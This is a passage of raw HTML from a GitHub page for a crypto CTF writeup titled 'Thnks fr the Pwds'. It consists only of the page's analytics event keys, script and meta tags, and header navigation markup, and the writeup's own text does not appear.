"click.homepage_signup"}, {"experimentIds": [], "id": "19988571001", "key": "click.create_enterprise_trial"}, {"experimentIds": [], "id": "20036538294", "key": "click.create_organization_team"}, {"experimentIds": [], "id": "20040653299", "key": "click.input_enterprise_trial_form"}, {"experimentIds": [], "id": "20062030003", "key": "click.continue_with_team"}, {"experimentIds": [], "id": "20068947153", "key": "click.create_organization_free"}, {"experimentIds": [], "id": "20086636658", "key": "click.signup_continue.username"}, {"experimentIds": [], "id": "20091648988", "key": "click.signup_continue.create_account"}, {"experimentIds": [], "id": "20103637615", "key": "click.signup_continue.email"}, {"experimentIds": [], "id": "20111574253", "key": "click.signup_continue.password"}, {"experimentIds": [], "id": "20120044111", "key": "view.pricing_page"}, {"experimentIds": [], "id": "20152062109", "key": "submit.create_account"}, {"experimentIds": [], "id": "20165800992", "key": "submit.upgrade_payment_form"}, {"experimentIds": [], "id": "20171520319", "key": "submit.create_organization"}, {"experimentIds": [], "id": "20222645674", "key": "click.recommended_plan_in_signup.discuss_your_needs"}, {"experimentIds": [], "id": "20227443657", "key": "submit.verify_primary_user_email"}, {"experimentIds": [], "id": "20234607160", "key": "click.recommended_plan_in_signup.try_enterprise"}, {"experimentIds": [], "id": "20238175784", "key": "click.recommended_plan_in_signup.team"}, {"experimentIds": [], "id": "20239847212", "key": "click.recommended_plan_in_signup.continue_free"}, {"experimentIds": [], "id": "20251097193", "key": "recommended_plan"}, {"experimentIds": [], "id": "20438619534", "key": "click.pricing_calculator.1_member"}, {"experimentIds": [], "id": "20456699683", "key": "click.pricing_calculator.15_members"}, {"experimentIds": [], "id": "20467868331", "key": "click.pricing_calculator.10_members"}, {"experimentIds": [], "id": "20476267432", "key": "click.trial_days_remaining"}, {"experimentIds": [], "id": "20476357660", "key": "click.discover_feature"}, {"experimentIds": [], "id": "20479287901", "key": "click.pricing_calculator.custom_members"}, {"experimentIds": [], "id": "20481107083", "key": "click.recommended_plan_in_signup.apply_teacher_benefits"}, {"experimentIds": [], "id": "20483089392", "key": "click.pricing_calculator.5_members"}, {"experimentIds": [], "id": "20484283944", "key": "click.onboarding_task"}, {"experimentIds": [], "id": "20484996281", "key": "click.recommended_plan_in_signup.apply_student_benefits"}, {"experimentIds": [], "id": "20486713726", "key": "click.onboarding_task_breadcrumb"}, {"experimentIds": [], "id": "20490791319", "key": "click.upgrade_to_enterprise"}, {"experimentIds": [], "id": "20491786766", "key": "click.talk_to_us"}, {"experimentIds": [], "id": "20494144087", "key": "click.dismiss_enterprise_trial"}, {"experimentIds": [], "id": "20499722759", "key": "completed_all_tasks"}, {"experimentIds": [], "id": "20500710104", "key": "completed_onboarding_tasks"}, {"experimentIds": [], "id": "20513160672", "key": "click.read_doc"}, {"experimentIds": [], "id": "20516196762", "key": "actions_enabled"}, {"experimentIds": [], "id": "20518980986", "key": "click.dismiss_trial_banner"}, {"experimentIds": [], "id": "20535446721", "key": "click.issue_actions_prompt.dismiss_prompt"}, {"experimentIds": [], "id": "20557002247", "key": "click.issue_actions_prompt.setup_workflow"}, {"experimentIds": [], "id": "20595070227", "key": "click.pull_request_setup_workflow"}, {"experimentIds": [], "id": "20626600314", "key": "click.seats_input"}, {"experimentIds": [], "id": "20642310305", "key": "click.decrease_seats_number"}, {"experimentIds": [], "id": "20662990045", "key": "click.increase_seats_number"}, {"experimentIds": [], "id": "20679620969", "key": "click.public_product_roadmap"}, {"experimentIds": [], "id": "20761240940", "key": "click.dismiss_survey_banner"}, {"experimentIds": [], "id": "20767210721", "key": "click.take_survey"}, {"experimentIds": [], "id": "20795281201", "key": "click.archive_list"}, {"experimentIds": [], "id": "20966790249", "key": "contact_sales.submit"}, {"experimentIds": [], "id": "20996500333", "key": "contact_sales.existing_customer"}, {"experimentIds": [], "id": "20996890162", "key": "contact_sales.blank_message_field"}, {"experimentIds": [], "id": "21000470317", "key": "contact_sales.personal_email"}, {"experimentIds": [], "id": "21002790172", "key": "contact_sales.blank_phone_field"}, {"experimentIds": [], "id": "21354412592", "key": "click.dismiss_create_readme"}, {"experimentIds": [], "id": "21366102546", "key": "click.dismiss_zero_user_content"}, {"experimentIds": [], "id": "21370252505", "key": "account_did_downgrade"}, {"experimentIds": [], "id": "21370840408", "key": "click.cta_create_readme"}, {"experimentIds": [], "id": "21375451068", "key": "click.cta_create_new_repository"}, {"experimentIds": [], "id": "21385390948", "key": "click.zero_user_content"}, {"experimentIds": [], "id": "21467712175", "key": "click.downgrade_keep"}, {"experimentIds": [], "id": "21484112202", "key": "click.downgrade"}, {"experimentIds": [], "id": "21495292213", "key": "click.downgrade_survey_exit"}, {"experimentIds": [], "id": "21508241468", "key": "click.downgrade_survey_submit"}, {"experimentIds": [], "id": "21512030356", "key": "click.downgrade_support"}, {"experimentIds": [], "id": "21539090022", "key": "click.downgrade_exit"}, {"experimentIds": [], "id": "21543640644", "key": "click_fetch_upstream"}, {"experimentIds": [], "id": "21646510300", "key": "click.move_your_work"}, {"experimentIds": [], "id": "21656151116", "key": "click.add_branch_protection_rule"}, {"experimentIds": [], "id": "21663860599", "key": "click.downgrade_dialog_open"}, {"experimentIds": [], "id": "21687860483", "key": "click.learn_about_protected_branches"}, {"experimentIds": [], "id": "21689050333", "key": "click.dismiss_protect_this_branch"}, {"experimentIds": [], "id": "21864370109", "key": "click.sign_in"}], "revision": "1372"}" />
<script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/wp-runtime-774bfe5ae983.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_stacktrace-parser_dist_stack-trace-parser_esm_js-node_modules_github_bro-327bbf-0aaeb22dd2a5.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/ui_packages_soft-nav_soft-nav_ts-21fc7a4a0e8f.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/environment-e059fd03252f.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_selector-observer_dist_index_esm_js-2646a2c533e3.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_delegated-events_dist_index_js-node_modules_github_details-dialog-elemen-63debe-c04540d458d4.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_relative-time-element_dist_index_js-b9368a9cb79e.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_fzy_js_index_js-node_modules_github_markdown-toolbar-element_dist_index_js-e3de700a4c9d.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_auto-complete-element_dist_index_js-node_modules_github_catalyst_-6afc16-e779583c369f.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_file-attachment-element_dist_index_js-node_modules_github_text-ex-3415a8-7ecc10fb88d0.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_filter-input-element_dist_index_js-node_modules_github_remote-inp-79182d-befd2b2f5880.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_primer_view-components_app_components_primer_primer_js-node_modules_gith-6a1af4-df3bc95b06d3.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/github-elements-fc0e0b89822a.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/element-registry-1641411db24a.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_lit-html_lit-html_js-9d9fe1859ce5.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_manuelpuyol_turbo_dist_turbo_es2017-esm_js-4140d67f0cc2.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_mini-throttle_dist_index_js-node_modules_github_alive-client_dist-bf5aa2-424aa982deef.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_primer_behaviors_dist_esm_dimensions_js-node_modules_github_hotkey_dist_-9fc4f4-d434ddaf3207.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_color-convert_index_js-35b3ae68c408.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_remote-form_dist_index_js-node_modules_github_session-resume_dist-def857-2a32d97c93c5.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_paste-markdown_dist_index_esm_js-node_modules_github_quote-select-15ddcc-1512e06cfee0.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_updatable-content_ts-430cacb5f7df.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_behaviors_keyboard-shortcuts-helper_ts-app_assets_modules_github_be-f5afdb-8dd5f026c5b9.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_sticky-scroll-into-view_ts-0af96d15a250.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_behaviors_include-fragment_ts-app_assets_modules_github_behaviors_r-4077b4-75370d1c1705.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_behaviors_commenting_edit_ts-app_assets_modules_github_behaviors_ht-83c235-7883159efa9e.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/behaviors-742151da9690.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_delegated-events_dist_index_js-node_modules_github_catalyst_lib_index_js-06ff531-32d7d1e94817.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/notifications-global-f5b58d24780b.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_optimizely_optimizely-sdk_dist_optimizely_browser_es_min_js-node_modules-3f2a9e-65eee21d1482.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/optimizely-26cee11e2e10.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_morphdom_dist_morphdom-esm_js-node_modules_github_template-parts_lib_index_js-58417dae193c.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_virtualized-list_es_index_js-node_modules_github_memoize_dist_esm_index_js-8496b7c4b809.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_filter-input-element_dist_index_js-node_modules_github_mini-throt-a33094-b03defd3289b.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_file-attachment-element_dist_index_js-node_modules_github_mini-th-85225b-226fc85f9b72.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_ref-selector_ts-7bdefeb88a1a.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/repositories-8093725f8825.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_clipboard-copy-element_dist_index_esm_js-node_modules_github_remo-8e6bec-232430bfe6da.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_mini-throttle_dist_decorators_js-node_modules_scroll-anchoring_di-e71893-cc1b30c51a28.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_diffs_blob-lines_ts-app_assets_modules_github_diffs_linkable-line-n-f96c66-97aade341120.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/diffs-3a64c1f69a81.js"></script>
<title>CTF-Writeups/Thnks fr the Pwds.md at 3dfbfc9f6d536f6f42758da711d280dfe61cf9d2 · palanioffcl/CTF-Writeups · GitHub</title>
<meta name="route-pattern" content="/:user_id/:repository/blob/*name(/*path)">
<meta name="current-catalog-service-hash" content="581425c0eaaa5e5e53c5b736f58a14dbe5d38b0be425901738ad0670bd1d5a33">
<meta name="request-id" content="E047:87C6:1D1EC963:1DFEB182:64121C68" data-pjax-transient="true"/><meta name="html-safe-nonce" content="0cb0d7fa8970fdbbd39b76e3b7dbd009aa5bfe667a2e57187776ee054345995c" data-pjax-transient="true"/><meta name="visitor-payload" content="eyJyZWZlcnJlciI6IiIsInJlcXVlc3RfaWQiOiJFMDQ3Ojg3QzY6MUQxRUM5NjM6MURGRUIxODI6NjQxMjFDNjgiLCJ2aXNpdG9yX2lkIjoiMjY4MTUzMTc0MTY2ODI1Mjc3NiIsInJlZ2lvbl9lZGdlIjoiZnJhIiwicmVnaW9uX3JlbmRlciI6ImZyYSJ9" data-pjax-transient="true"/><meta name="visitor-hmac" content="43031193c77c9aae530add30b899c2e3346bb6f955ea7b61686713bcb92332af" data-pjax-transient="true"/>
<meta name="hovercard-subject-tag" content="repository:426049755" data-turbo-transient>
<meta name="github-keyboard-shortcuts" content="repository,source-code,file-tree" data-turbo-transient="true" />
<meta name="selected-link" value="repo_source" data-turbo-transient>
<meta name="google-site-verification" content="c1kuD-K2HIVF635lypcsWPoD4kilo5-jA_wBFyT4uMY"> <meta name="google-site-verification" content="KT5gs8h0wvaagLKAVWq8bbeNwnZZK1r1XQysX3xurLU"> <meta name="google-site-verification" content="ZzhVyEFwb7w3e0-uOTltm8Jsck2F5StVihD0exw2fsA"> <meta name="google-site-verification" content="GXs5KoUUkNCoaAZn7wPN-t01Pywp9M3sEjnt_3_ZWPc"> <meta name="google-site-verification" content="Apib7-x98H0j5cPqHWwSMm6dNU4GmODRoqxLiDzdx9I">
<meta name="octolytics-url" content="https://collector.github.com/github/collect" />
<meta name="analytics-location" content="/<user-name>/<repo-name>/blob/show" data-turbo-transient="true" />
<meta name="user-login" content="">
<meta name="viewport" content="width=device-width"> <meta name="description" content="The Challenges which i solved in various CTFs can be seen here :) - CTF-Writeups/Thnks fr the Pwds.md at 3dfbfc9f6d536f6f42758da711d280dfe61cf9d2 · palanioffcl/CTF-Writeups"> <link rel="search" type="application/opensearchdescription+xml" href="/opensearch.xml" title="GitHub"> <link rel="fluid-icon" href="https://github.com/fluidicon.png" title="GitHub"> <meta property="fb:app_id" content="1401488693436528"> <meta name="apple-itunes-app" content="app-id=1477376905" /> <meta name="twitter:image:src" content="https://opengraph.githubassets.com/f7c95df364a3f5d08c61ded109ec3fced5134ab61893e049d19d5447e2d6c36f/palanioffcl/CTF-Writeups" /><meta name="twitter:site" content="@github" /><meta name="twitter:card" content="summary_large_image" /><meta name="twitter:title" content="CTF-Writeups/Thnks fr the Pwds.md at 3dfbfc9f6d536f6f42758da711d280dfe61cf9d2 · palanioffcl/CTF-Writeups" /><meta name="twitter:description" content="The Challenges which i solved in various CTFs can be seen here :) - CTF-Writeups/Thnks fr the Pwds.md at 3dfbfc9f6d536f6f42758da711d280dfe61cf9d2 · palanioffcl/CTF-Writeups" /> <meta property="og:image" content="https://opengraph.githubassets.com/f7c95df364a3f5d08c61ded109ec3fced5134ab61893e049d19d5447e2d6c36f/palanioffcl/CTF-Writeups" /><meta property="og:image:alt" content="The Challenges which i solved in various CTFs can be seen here :) - CTF-Writeups/Thnks fr the Pwds.md at 3dfbfc9f6d536f6f42758da711d280dfe61cf9d2 · palanioffcl/CTF-Writeups" /><meta property="og:image:width" content="1200" /><meta property="og:image:height" content="600" /><meta property="og:site_name" content="GitHub" /><meta property="og:type" content="object" /><meta property="og:title" content="CTF-Writeups/Thnks fr the Pwds.md at 3dfbfc9f6d536f6f42758da711d280dfe61cf9d2 · palanioffcl/CTF-Writeups" /><meta property="og:url" content="https://github.com/palanioffcl/CTF-Writeups" /><meta property="og:description" content="The Challenges which i solved in various CTFs can be seen here :) - CTF-Writeups/Thnks fr the Pwds.md at 3dfbfc9f6d536f6f42758da711d280dfe61cf9d2 · palanioffcl/CTF-Writeups" /> <link rel="assets" href="https://github.githubassets.com/">
<meta name="hostname" content="github.com">
<meta name="expected-hostname" content="github.com">
<meta name="enabled-features" content="TURBO_EXPERIMENT_RISKY,IMAGE_METRIC_TRACKING,GEOJSON_AZURE_MAPS">
<meta http-equiv="x-pjax-version" content="ef97471de14f8d2285f0269e8f0f7dc70845f693d3f6ccd2dd2daae5cd1bbebe" data-turbo-track="reload"> <meta http-equiv="x-pjax-csp-version" content="2a84822a832da97f1ea76cf989a357ec70c85713a2fd8f14c8421b76bbffe38c" data-turbo-track="reload"> <meta http-equiv="x-pjax-css-version" content="adfc12179419e463f9f320d07920b1684c9b7e060d4d9cd3a6cd5d0de37ce710" data-turbo-track="reload"> <meta http-equiv="x-pjax-js-version" content="711646ae23abb27cf728346f30f81c042d4428233a0795acf0e21ed664fe9d94" data-turbo-track="reload">
<meta name="turbo-cache-control" content="no-preview" data-turbo-transient="">
<meta data-hydrostats="publish">
<meta name="go-import" content="github.com/palanioffcl/CTF-Writeups git https://github.com/palanioffcl/CTF-Writeups.git">
<meta name="octolytics-dimension-user_id" content="84482008" /><meta name="octolytics-dimension-user_login" content="palanioffcl" /><meta name="octolytics-dimension-repository_id" content="426049755" /><meta name="octolytics-dimension-repository_nwo" content="palanioffcl/CTF-Writeups" /><meta name="octolytics-dimension-repository_public" content="true" /><meta name="octolytics-dimension-repository_is_fork" content="false" /><meta name="octolytics-dimension-repository_network_root_id" content="426049755" /><meta name="octolytics-dimension-repository_network_root_nwo" content="palanioffcl/CTF-Writeups" />
<link rel="canonical" href="https://github.com/palanioffcl/CTF-Writeups/blob/3dfbfc9f6d536f6f42758da711d280dfe61cf9d2/Meta%20games%20CTF%202021/Crypto/Thnks%20fr%20the%20Pwds.md" data-turbo-transient> <meta name="turbo-body-classes" content="logged-out env-production page-responsive page-blob">
<meta name="browser-stats-url" content="https://api.github.com/_private/browser/stats">
<meta name="browser-errors-url" content="https://api.github.com/_private/browser/errors">
<meta name="browser-optimizely-client-errors-url" content="https://api.github.com/_private/browser/optimizely_client/errors">
<link rel="mask-icon" href="https://github.githubassets.com/pinned-octocat.svg" color="#000000"> <link rel="alternate icon" class="js-site-favicon" type="image/png" href="https://github.githubassets.com/favicons/favicon.png"> <link rel="icon" class="js-site-favicon" type="image/svg+xml" href="https://github.githubassets.com/favicons/favicon.svg">
<meta name="theme-color" content="#1e2327"><meta name="color-scheme" content="light dark" />
<link rel="manifest" href="/manifest.json" crossOrigin="use-credentials">
</head>
<body class="logged-out env-production page-responsive page-blob" style="word-wrap: break-word;"> <div data-turbo-body class="logged-out env-production page-responsive page-blob" style="word-wrap: break-word;">
<div class="position-relative js-header-wrapper "> Skip to content <span> <span></span></span>
<script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_remote-form_dist_index_js-node_modules_delegated-events_dist_inde-94fd67-04fa93bb158a.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/sessions-9920eaa99f50.js"></script><header class="Header-old header-logged-out js-details-container Details position-relative f4 py-3" role="banner"> <button type="button" class="Header-backdrop d-lg-none border-0 position-fixed top-0 left-0 width-full height-full js-details-target" aria-label="Toggle navigation"> <span>Toggle navigation</span> </button>
<div class="container-xl d-flex flex-column flex-lg-row flex-items-center p-responsive height-full position-relative z-1"> <div class="d-flex flex-justify-between flex-items-center width-full width-lg-auto"> <svg height="32" aria-hidden="true" viewBox="0 0 16 16" version="1.1" width="32" data-view-component="true" class="octicon octicon-mark-github"> <path d="M8 0c4.42 0 8 3.58 8 8a8.013 8.013 0 0 1-5.45 7.59c-.4.08-.55-.17-.55-.38 0-.27.01-1.13.01-2.2 0-.75-.25-1.23-.54-1.48 1.78-.2 3.65-.88 3.65-3.95 0-.88-.31-1.59-.82-2.15.08-.2.36-1.02-.08-2.12 0 0-.67-.22-2.2.82-.64-.18-1.32-.27-2-.27-.68 0-1.36.09-2 .27-1.53-1.03-2.2-.82-2.2-.82-.44 1.1-.16 1.92-.08 2.12-.51.56-.82 1.28-.82 2.15 0 3.06 1.86 3.75 3.64 3.95-.23.2-.44.55-.51 1.07-.46.21-1.61.55-2.33-.66-.15-.24-.6-.83-1.23-.82-.67.01-.27.38.01.53.34.19.73.9.82 1.13.16.45.68 1.31 2.69.94 0 .67.01 1.3.01 1.49 0 .21-.15.45-.55.38A7.995 7.995 0 0 1 0 8c0-4.42 3.58-8 8-8Z"></path></svg>
<div class="flex-1"> Sign up </div>
<div class="flex-1 flex-order-2 text-right"> <button aria-label="Toggle navigation" aria-expanded="false" type="button" data-view-component="true" class="js-details-target Button--link Button--medium Button d-lg-none color-fg-inherit p-1"> <span> <span><div class="HeaderMenu-toggle-bar rounded my-1"></div> <div class="HeaderMenu-toggle-bar rounded my-1"></div> <div class="HeaderMenu-toggle-bar rounded my-1"></div></span> </span></button> </div> </div>
<div class="HeaderMenu--logged-out p-responsive height-fit position-lg-relative d-lg-flex flex-column flex-auto pt-7 pb-4 top-0"> <div class="header-menu-wrapper d-flex flex-column flex-self-end flex-lg-row flex-justify-between flex-auto p-3 p-lg-0 rounded rounded-lg-0 mt-3 mt-lg-0"> <nav class="mt-0 px-3 px-lg-0 mb-3 mb-lg-0" aria-label="Global"> <button type="button" class="HeaderMenu-link border-0 width-full width-lg-auto px-0 px-lg-2 py-3 py-lg-2 no-wrap d-flex flex-items-center flex-justify-between js-details-target" aria-expanded="false"> Product <svg opacity="0.5" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-chevron-down HeaderMenu-icon ml-1"> <path d="M12.78 5.22a.749.749 0 0 1 0 1.06l-4.25 4.25a.749.749 0 0 1-1.06 0L3.22 6.28a.749.749 0 1 1 1.06-1.06L8 8.939l3.72-3.719a.749.749 0 0 1 1.06 0Z"></path></svg> </button> <div class="HeaderMenu-dropdown dropdown-menu rounded m-0 p-0 py-2 py-lg-4 position-relative position-lg-absolute left-0 left-lg-n3 d-lg-flex dropdown-menu-wide">
<svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-workflow color-fg-subtle mr-3"> <path d="M1 3a2 2 0 0 1 2-2h6.5a2 2 0 0 1 2 2v6.5a2 2 0 0 1-2 2H7v4.063C7 16.355 7.644 17 8.438 17H12.5v-2.5a2 2 0 0 1 2-2H21a2 2 0 0 1 2 2V21a2 2 0 0 1-2 2h-6.5a2 2 0 0 1-2-2v-2.5H8.437A2.939 2.939 0 0 1 5.5 15.562V11.5H3a2 2 0 0 1-2-2Zm2-.5a.5.5 0 0 0-.5.5v6.5a.5.5 0 0 0 .5.5h6.5a.5.5 0 0 0 .5-.5V3a.5.5 0 0 0-.5-.5ZM14.5 14a.5.5 0 0 0-.5.5V21a.5.5 0 0 0 .5.5H21a.5.5 0 0 0 .5-.5v-6.5a.5.5 0 0 0-.5-.5Z"></path></svg> <div> <div class="color-fg-default h4">Actions</div> Automate any workflow </div>
<svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-package color-fg-subtle mr-3"> <path d="M12.876.64V.639l8.25 4.763c.541.313.875.89.875 1.515v9.525a1.75 1.75 0 0 1-.875 1.516l-8.25 4.762a1.748 1.748 0 0 1-1.75 0l-8.25-4.763a1.75 1.75 0 0 1-.875-1.515V6.917c0-.625.334-1.202.875-1.515L11.126.64a1.748 1.748 0 0 1 1.75 0Zm-1 1.298L4.251 6.34l7.75 4.474 7.75-4.474-7.625-4.402a.248.248 0 0 0-.25 0Zm.875 19.123 7.625-4.402a.25.25 0 0 0 .125-.216V7.639l-7.75 4.474ZM3.501 7.64v8.803c0 .09.048.172.125.216l7.625 4.402v-8.947Z"></path></svg> <div> <div class="color-fg-default h4">Packages</div> Host and manage packages </div>
<svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-shield-check color-fg-subtle mr-3"> <path d="M16.53 9.78a.75.75 0 0 0-1.06-1.06L11 13.19l-1.97-1.97a.75.75 0 0 0-1.06 1.06l2.5 2.5a.75.75 0 0 0 1.06 0l5-5Z"></path><path d="m12.54.637 8.25 2.675A1.75 1.75 0 0 1 22 4.976V10c0 6.19-3.771 10.704-9.401 12.83a1.704 1.704 0 0 1-1.198 0C5.77 20.705 2 16.19 2 10V4.976c0-.758.489-1.43 1.21-1.664L11.46.637a1.748 1.748 0 0 1 1.08 0Zm-.617 1.426-8.25 2.676a.249.249 0 0 0-.173.237V10c0 5.46 3.28 9.483 8.43 11.426a.199.199 0 0 0 .14 0C17.22 19.483 20.5 15.461 20.5 10V4.976a.25.25 0 0 0-.173-.237l-8.25-2.676a.253.253 0 0 0-.154 0Z"></path></svg> <div> <div class="color-fg-default h4">Security</div> Find and fix vulnerabilities </div>
<svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-codespaces color-fg-subtle mr-3"> <path d="M3.5 3.75C3.5 2.784 4.284 2 5.25 2h13.5c.966 0 1.75.784 1.75 1.75v7.5A1.75 1.75 0 0 1 18.75 13H5.25a1.75 1.75 0 0 1-1.75-1.75Zm-2 12c0-.966.784-1.75 1.75-1.75h17.5c.966 0 1.75.784 1.75 1.75v4a1.75 1.75 0 0 1-1.75 1.75H3.25a1.75 1.75 0 0 1-1.75-1.75ZM5.25 3.5a.25.25 0 0 0-.25.25v7.5c0 .138.112.25.25.25h13.5a.25.25 0 0 0 .25-.25v-7.5a.25.25 0 0 0-.25-.25Zm-2 12a.25.25 0 0 0-.25.25v4c0 .138.112.25.25.25h17.5a.25.25 0 0 0 .25-.25v-4a.25.25 0 0 0-.25-.25Z"></path><path d="M10 17.75a.75.75 0 0 1 .75-.75h6.5a.75.75 0 0 1 0 1.5h-6.5a.75.75 0 0 1-.75-.75Zm-4 0a.75.75 0 0 1 .75-.75h.5a.75.75 0 0 1 0 1.5h-.5a.75.75 0 0 1-.75-.75Z"></path></svg> <div> <div class="color-fg-default h4">Codespaces</div> Instant dev environments </div>
<svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-copilot color-fg-subtle mr-3"> <path d="M9.75 14a.75.75 0 0 1 .75.75v2.5a.75.75 0 0 1-1.5 0v-2.5a.75.75 0 0 1 .75-.75Zm4.5 0a.75.75 0 0 1 .75.75v2.5a.75.75 0 0 1-1.5 0v-2.5a.75.75 0 0 1 .75-.75Z"></path><path d="M12 2c2.214 0 4.248.657 5.747 1.756.136.099.268.204.397.312.584.235 1.077.546 1.474.952.85.869 1.132 2.037 1.132 3.368 0 .368-.014.733-.052 1.086l.633 1.478.043.022A4.75 4.75 0 0 1 24 15.222v1.028c0 .529-.309.987-.565 1.293-.28.336-.636.653-.966.918a13.84 13.84 0 0 1-1.299.911l-.024.015-.006.004-.039.025c-.223.135-.45.264-.68.386-.46.245-1.122.571-1.941.895C16.845 21.344 14.561 22 12 22c-2.561 0-4.845-.656-6.479-1.303a19.046 19.046 0 0 1-1.942-.894 14.081 14.081 0 0 1-.535-.3l-.144-.087-.04-.025-.006-.004-.024-.015a13.16 13.16 0 0 1-1.299-.911 6.913 6.913 0 0 1-.967-.918C.31 17.237 0 16.779 0 16.25v-1.028a4.75 4.75 0 0 1 2.626-4.248l.043-.022.633-1.478a10.195 10.195 0 0 1-.052-1.086c0-1.331.282-2.498 1.132-3.368.397-.406.89-.717 1.474-.952.129-.108.261-.213.397-.312C7.752 2.657 9.786 2 12 2Zm-8 9.654v6.669a17.59 17.59 0 0 0 2.073.98C7.595 19.906 9.686 20.5 12 20.5c2.314 0 4.405-.594 5.927-1.197a17.59 17.59 0 0 0 2.073-.98v-6.669l-.038-.09c-.046.061-.095.12-.145.177-.793.9-2.057 1.259-3.782 1.259-1.59 0-2.738-.544-3.508-1.492a4.323 4.323 0 0 1-.355-.508h-.344a4.323 4.323 0 0 1-.355.508C10.704 12.456 9.555 13 7.965 13c-1.725 0-2.989-.359-3.782-1.259a3.026 3.026 0 0 1-.145-.177Zm6.309-1.092c.445-.547.708-1.334.851-2.301.057-.357.087-.718.09-1.079v-.031c-.001-.762-.166-1.26-.43-1.568l-.008-.01c-.341-.391-1.046-.689-2.533-.529-1.505.163-2.347.537-2.824 1.024-.462.473-.705 1.18-.705 2.32 0 .605.044 1.087.135 1.472.092.384.231.672.423.89.365.413 1.084.75 2.657.75.91 0 1.527-.223 1.964-.564.14-.11.268-.235.38-.374Zm2.504-2.497c.136 1.057.403 1.913.878 2.497.442.545 1.134.938 2.344.938 1.573 0 2.292-.337 2.657-.751.384-.435.558-1.151.558-2.361 0-1.14-.243-1.847-.705-2.319-.477-.488-1.318-.862-2.824-1.025-1.487-.161-2.192.139-2.533.529-.268.308-.437.808-.438 1.578v.02c.002.299.023.598.063.894Z"></path></svg> <div> <div class="color-fg-default h4">Copilot</div> Write better code with AI </div>
